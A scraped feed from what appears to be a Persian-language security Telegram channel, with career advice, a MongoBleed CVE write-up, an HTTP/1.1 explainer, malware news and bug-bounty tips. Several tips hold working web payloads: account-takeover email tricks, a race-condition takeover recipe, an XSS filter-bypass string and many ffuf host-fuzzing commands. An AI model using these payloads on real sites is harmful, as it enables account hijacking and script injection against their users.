RadvanSec – Telegram
RadvanSec
1.02K subscribers
189 photos
27 videos
144 files
605 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
RadvanSec
این یک پست لینکدین بود واقعا چشم انداز امنیت در حال تغییر هست و سمت و سوی هوش مصنوعی و AI رو داره میگیره در مطالعه روزمره تون حتما یک کتاب درمورد هوش مصنوعی داشته باشید و مطالعه کنید هم بعدها میتونید در فرایند های مختلف استفاده کنید و یا حتی آسیب پذیری هایی…
نکته بعدی اینکه دوره هایی که سر و ته ندارن رو هم شرکت نکنید الان کم کم داره این اتفاق میافته یکسری ها هم موج سواری میکنن به هرچیزی کلمه ai میچسبونن و به اسم مسیر و حوزه جدید ارائه میکنن و بابت دوره هاشون هزینه های هنگفتی میگیرن شما قبل از اینکه دوره شرکت کنی (نه هر دوره ای!) حدااقل پایه و بیس رو بلد باش و بعد دوره شرکت کن تا بتونی عملی یکسری چیزارو متوجهشون بشی و البته همزمان مطالعه روزانه فراموش نباید بشه و حتما مطالعه روزانه باید روتین زندگیتون بشه در هر حوزه ای که هستید…
اگر شما متمرکز رو یک حوزه باشید خوبه ولی اگر از حوزه های دیگه هم چیزایی یاد بگیرید یکسری اوقات تو ذهنتون یه جرقه هایی میاد که باعث میشه بتونید دوتا حوزه که در ظاهر هیچ ربطی بهم ندارند شما بهم مربوطش کنید اینطوری میشید یک انسان متفکر و خلاق و ایده های نیچ هم از همین جاها میاد که میتونه گاهی اوقات دنیارو تغییر بده

در کل هرچیزی که به ذهنتون اومد و احمقانه بنظر میرسید و حتی اگر همه شمارو تمسخر کردند مطمن باشید اون بهترین فکره (در شرایط خاص)
👍71
🧠 تحلیل تخصصی CVE-2025-14847 – «MongoBleed»: افشای حافظه در MongoDB

📌 شناسه آسیب‌پذیری: CVE-2025-14847
📌 نام غیررسمی: MongoBleed
📌 CVSS: ~8.7 (High/High-Severity)
The Hacker News

📌 وضعیت احراز هویت: بدون نیاز به احراز هویت (Pre-auth)
The Hacker News

🧩 ماهیت فنی آسیب‌پذیری

این نقص در لایه‌ی فشرده‌سازی/دکمپرسیون پیام‌های پروتکل شبکه MongoDB قرار دارد و ناشی از مدیریت نادرست طول داده‌های فشرده‌شده با zlib است.

در پروتکل MongoDB، پیام‌های شبکه‌ای می‌توانند با الگوریتم‌های فشرده‌سازی ارسال شوند. نقص زمانی رخ می‌دهد که فیلد طول ادعایی (uncompressedSize) در هدر پیامِ فشرده با مقدار واقعی داده همخوانی ندارد. سرور بر اساس این مقدار ادعایی بافرهایی اختصاص می‌دهد، اما داده‌های دکمپرش شده واقعی کوتاه‌تر هستند. به‌دلیل مدیریت نادرست، بخش‌های حافظه‌ی heap مقداردهی‌نشده در پاسخ جای می‌گیرند و به‌صورت ناقص به کلاینت ارسال می‌شوند.
The Hacker News

این رخداد امکان افشای بخش‌های تصادفی حافظه سرور را به مهاجم فراهم می‌کند حتی بدون داشتن credential یا session معتبر.

🧪 سازوکار اثبات مفهوم (PoC)

PoCهای اولیه به این صورت عمل می‌کنند:

ارسال بسته‌های zlib با هدرهای دارای مقدار طول غیرمنطقی (یعنی طول واقعی کوچکتر از چیزی که هدر گزارش می‌دهد).

سرور بافر بزرگتری تخصیص می‌دهد و سپس عمل دکمپرسیون انجام می‌شود.

بخش‌های “مقداردهی‌نشده” حافظه که هنوز پاک نشده‌اند، در پاسخ ارسال می‌شوند.

با پروب‌های متعدد می‌توان بخش‌های مختلف حافظه را بیرون کشید.

داده‌هایی مانند پیکربندی WiredTiger، آدرس‌های اتصال، و داده‌های موقت ممکن است لو بروند.
Cyber Security News

این روند از نظر مفهومی شبیه Heartbleed (که در OpenSSL رخ داد) است: هر دو مورد منجر به افشای تصادفی بخش‌هایی از حافظه‌ی پروسه می‌شود.

🎯 دامنه‌ی تأثیر

آسیب‌پذیری در نسخه‌های متعددی از MongoDB وجود دارد:

نسخه‌های آسیب‌پذیر

MongoDB 8.2.0 – 8.2.2

MongoDB 8.0.0 – 8.0.16

MongoDB 7.0.0 – 7.0.26

MongoDB 6.0.0 – 6.0.26

MongoDB 5.0.0 – 5.0.31

MongoDB 4.4.0 – 4.4.29

MongoDB تمام نسخه‌های 4.2, 4.0, 3.6
The Hacker News

توجه: برخی مستندات نیز اشاره دارند که تحت شرایط خاص و ترکیب با سایر نقص‌ها، ممکن است امکان RCE یا حملات زنجیره‌ای فراهم شود، اگرچه در تحلیل رسمی MongoDB تمرکز بر افشای حافظه بوده است.

Exploit

⭐️ @RadvanSec
1👍1
🔥2
Cloudbaaz
سلام به همگی👋🏻
یه لایو داریم در خصوص باج افزار ها و حملات نو ظهور با مهندس رضا محمدزاده عزیز دوست خوبم، در خصوص نحوه حملات جدید و راهکار های جلوگیری و تحلیل های امنیتی این حملات👌
خوشحال میشم اگر تمایل داشتید شرکت کنید و با هم در خصوص این موارد یه گپ و گفتی داشته باشیم🌷
دوشنبه ۸ دی ماه ساعت ۱۹
🛑لینک در کانال قرار داده میشه

کانال Radvansec:
@RadvanSec

کانال Cloudbaaz:
@Cloudbaaz
سلام دوستان امیدوارم حال همگی خوب و عالی باشه
من از همه عذرخواهی میکنم به علت کسالت و وضعیت افتضاح اینترنت لایو امروز در مورد باج افزار ها برگزار نمیشود و زمان جدید لایو متعاقبا اعلام خواهد شد تو این اوضاع هم بیشتر مراقب خودتون و خانوادتون باشید مجددا شرمسارم و برای همتون آرزوی سلامتی دارم 🙏
5❤‍🔥1
ملاحظات کلیدی HTTP/1.1 (Idempotency، Pipelining، Retry و TCP Close)

در HTTP/1.1 مفهوم Idempotency نقش محوری در طراحی امن کلاینت‌ها و API ها دارد یک درخواست Idempotent در صورت اجرای چند باره وضعیت نهایی سیستم را تغییر نمیدهد. متدهای GET، HEAD، PUT، DELETE، OPTIONS و TRACE در این دسته قرار می‌گیرند، در حالی که POST ذاتاا Non-Idempotent است و تکرار آن می‌تواند منجر به ایجاد چند باره منبع، ثبت تراکنش تکراری یا تغییرات غیرقابل بازگشت شود که threat modeling میشه Race-Condition

به همین دلیل، اگرچه HTTP/1.1 از Request Pipelining پشتیبانی می‌کند، این قابلیت فقط برای درخواست‌های Idempotent (خودتوان) ایمن است
در Pipelining، چند درخواست بدون انتظار برای پاسخ قبلی ارسال می‌شوند. اگر Transport Connection پیش از دریافت پاسخ قطع شود، کلاینت نمی‌تواند تشخیص دهد که یک درخواست Non-Idempotent اجرا شده، اجرا نشده یا به‌صورت ناقص اجرا شده است. تکرار چنین درخواستی می‌تواند باعث Double Charge، Duplicate Order یا Data Corruption شود (Race-Condition Exploit) بنابراین درخواست ‌های Non-Idempotent مانند POST نباید Pipeline شوند

همین منطق در مورد Retry نیز صادق است. در صورت قطع ناگهانی اتصال، درخواست‌های Idempotent می‌توانند به‌ طور خودکار دوباره ارسال شوند، اما Non-Idempotent Request ها نباید Auto-Retry شوند. به همین علت User Agent ها تصمیم به تکرار POST را به کاربر انسانی واگذار می‌کنند؛ نمونه شناخته ‌شده آن هشدار مرورگر هنگام Refresh صفحه‌ای است که با POST ایجاد شده است.

در سطح پایین‌تر، موضوع Graceful Connection Close در TCP مطرح می‌ شود. اتصال TCP دوطرفه است و شامل کانال ارسال و دریافت مستقل است. فراخوانی close() هر دو کانال را می بندد (Full Close)، اما با shutdown() می‌توان فقط یکی از کانال ‌ها را بست (Half Close)
الگوی رایج این است که کلاینت پس از پایان ارسال درخواست، کانال خروجی را می‌ بندد ولی کانال ورودی را برای دریافت پاسخ کامل باز نگه می‌دارد. پیاده‌ سازی نادرست این رفتار می‌تواند باعث پاسخ ناقص، وضعیت نامشخص درخواست و تکرار ناخواسته عملیات شود.

جمع‌بندی: POST یک متد Non-Idempotent است، نباید Pipeline یا Auto-Retry شود، قطع ناگهانی TCP منبع رایج Race Condition و Logic Bug است، و مدیریت نادرست Half/Full Close می‌تواند به تکرار تراکنش یا خرابی وضعیت منجر شود. این‌ ها دقیقا همان نقاطی هستند که در پیاده‌سازی‌های ضعیف API و Proxy ها باگ‌ های سطح بالا از آن‌ها استخراج می‌شود

⭐️ @RadvanSec
2👍1
Forwarded from KALI
یه گروه هکری دولتی چینی اومده یه بدافزار به اسم ToneShell رو با یه روت‌کیت خیلی خفن ترکیب کرده تا فعالیت‌هاش کاملاً از دید ویندوز و آنتی‌ویروس‌ها قایم بمونه؛ این روت‌کیت توی هسته ویندوز (Kernel) لود میشه، فایل‌ها و ارتباطات بدافزار رو مخفی می‌کنه، حتی کاری می‌کنه Microsoft Defender هم نفهمه چی به چیه، و نتیجه‌ش اینه که هکرها می‌تونن مدت طولانی بی‌صدا داخل سیستم‌های دولتی (بیشتر تو آسیا) جاسوسی کنن، داده بدزدن و کنترل سیستم رو دستشون بگیرن بدون اینکه کسی بو ببره.


درایور مخرب با hook کردن توابع کرنل (مثل لیست پردازش‌ها و فایل‌ها) باعث میشه ToneShell اصلاً دیده نشه
ارتباط C2 (سرور فرماندهی) رمزگذاری شده‌ست و شبیه ترافیک عادی نشون داده میشه
بدافزار قابلیت remote command execution، آپلود/دانلود فایل، اجرای شل و persistence بلندمدت داره
چون تو کرنله، حذفش با ابزارهای معمول تقریباً غیرممکنه و اغلب نیاز به offline scan یا reinstall سیستم هست
هدف اصلیشون هم سازمان‌ها و نهادهای دولتی آسیایی بوده، یعنی جاسوسی بلندمدت نه خرابکاری.


@kali_signal
6🔥2
🔥51😍1
Happy New Year 🎉🥳
4🔥2
اختلال شدید اینترنت 👎

⭐️ @RadvanSec
👎6👍2🥰2
Forwarded from آرامش درونی
پدر یعنی:


ستونِ اطمینان؛
پناهی استوارکه تکیه می‌کنی
و هیچ هراسی از فرو ریختن نداری.



روز پدر بر همه‌ی پدران زحمت‌کش و فداکار مبارک باد.
❤‍🔥8
Forwarded from Cloudbaaz
📉آخرین وضعیت اینترنت در ایران که طبق گزارش آماری کلادفلر با ۳۵ درصد کاهش حجم ترافیک از حالت نرمال همراه بوده...🤦‍♂

عجب گیری کردیما😒
🤯3👍1
Yet another Account Takeover technique.

Seperator:
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

Array:
{"email":["victim@mail.com","hacker@mail.com"]}

#infosec #CyberSec #bugbountytips

⭐️ @RadvanSec
4
Race Condition to Account Takeover

1. User changes email:
POST /change-email → email=x@x(.com

2. Server sends confirmation link, but updates email before verification.

3. Attacker races the victim by claiming password reset for x@x(.com

⭐️ @RadvanSec

#Bugbountytips #BugBounty #CyberSecurity #infosec
#RadvanSec
5
Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets.

https://github.com/jenish-sojitra/JSAnalyzer

The tool helps find endpoints, files, internal emails, and some secrets from minified JS.

Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedbacks are welcome.

⭐️ @RadvanSec
2🔥1
🔎 #BugBountyTip Advanced Fuzzing Techniques Most Hunters Miss

0) Setup variables (optional)

DOMAIN="company.com"
ORIGIN="company.com" # or https://<cdn-origin> or https://<ip>
WL="words.txt"
HY="hybrid.txt"

1) Direct subdomain fuzz (fast check)

Works when DNS resolves the hostnames.

ffuf -w "$WL" -u "https://FUZZ.$DOMAIN/" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

2) VHOST / Host-header fuzz (CDN / reverse proxy routing)

When wildcard DNS isn’t visible but routing exists.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

Save results (JSON)

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -of json -o vhost_fuzz.json -ac

3) Hyphenated hosts

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

4) Suffix & prefix environment tags

FUZZ-test.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ-test.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

test-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: test-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

FUZZ.stage.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: FUZZ.stage.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

stage-FUZZ.company.com

ffuf -w "$WL" -u "$ORIGIN" -H "Host: stage-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

5) WWW namespace exploitation (🔥)

FUZZwww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

wwFUZZ.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: wwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

FUZZww.company.com

ffuf -w "$HY" -u "$ORIGIN" -H "Host: FUZZww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

6) Numeric drift (use a numbers list)

Create a quick numbers list:

seq -w 0 500 > nums.txt

025www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www02.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 350 -mc 200,301,302,401,403 -fs 0 -ac

www-03.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

03-www.company.com style

ffuf -w nums.txt -u "$ORIGIN" -H "Host: FUZZ-www.$DOMAIN" -t 300 -mc 200,301,302,401,403 -fs 0 -ac

7) Separator drift (dot / hyphen / underscore / none)

underscore in DNS labels is uncommon but shows up in some internal/service records; test where allowed.

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www-FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: www_FUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w "$WL" -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

8) Token fusion (role bleeding)

Use a curated list roles.txt like: api auth cdn static sso id app admin internal edge

ffuf -w roles.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w roles.txt -u "$ORIGIN" -H "Host: FUZZwww.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

9) Third-party / vendor overlay

vendors.txt: jira confluence grafana kibana sentry datadog okta zendesk status

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: FUZZ.$DOMAIN" -t 200 -mc 200,301,302,401,403 -fs 0 -ac

ffuf -w vendors.txt -u "$ORIGIN" -H "Host: wwwFUZZ.$DOMAIN" -t 250 -mc 200,301,302,401,403 -fs 0 -ac

10) Endpoint fuzzing (same mindset, different surface)

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -t 200 -mc 200,204,301,302,401,403 -fc 404 -fs 0 -ac

With extensions

ffuf -w endpoints.txt -u "$ORIGIN/FUZZ" -e .php,.asp,.aspx,.jsp,.json,.txt,.bak,.zip -t 200 -mc 200,301,302,401,403 -fc 404 -fs 0 -ac

⭐️ @RadvanSec
👍4
Forwarded from GO-TO CVE
با عرض سلام خدمت همه‌ی عزیزان

علیرغم وجود اسکم‌ها و مشکلات متعدد در برخی برنامه‌های باگ‌بانتی ایرانی و خارجی، تصمیم گرفتم این کانال رو راه‌اندازی کنم تا بتونیم تجربه‌های واقعی بچه های امنیت کار رو از همکاری با این برنامه‌ها در یکجا جمع‌آوری کنم.

هدف من و ادمین های عزیز اینه که بعد از بررسی و اطمینان از صحت گزارش‌ها، اون‌ها رو در اختیار عموم قرار بدیم تا سایر دوستان وقت، انرژی و تخصصشون رو بی‌دلیل تلف نکنن و بتونن آگاهانه‌تر وارد این حوزه یا کار روی برنامه خاصی بشن .

این کانال متعلق به همه‌ی شماست — جایی برای شفافیت، تجربه‌محوری و حمایت از جامعه امنیتی کشور. ⚡️

https://news.1rj.ru/str/bugbountyfeedback
👎3
Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:

<s"vg o"nload=al"ert() />

turns into a valid:

<noscript onload=alert()>

🚨 Never rely on poor input filtering!

#BugBounty #CyberSecurity

⭐️ @RadvanSec
2👍2🔥1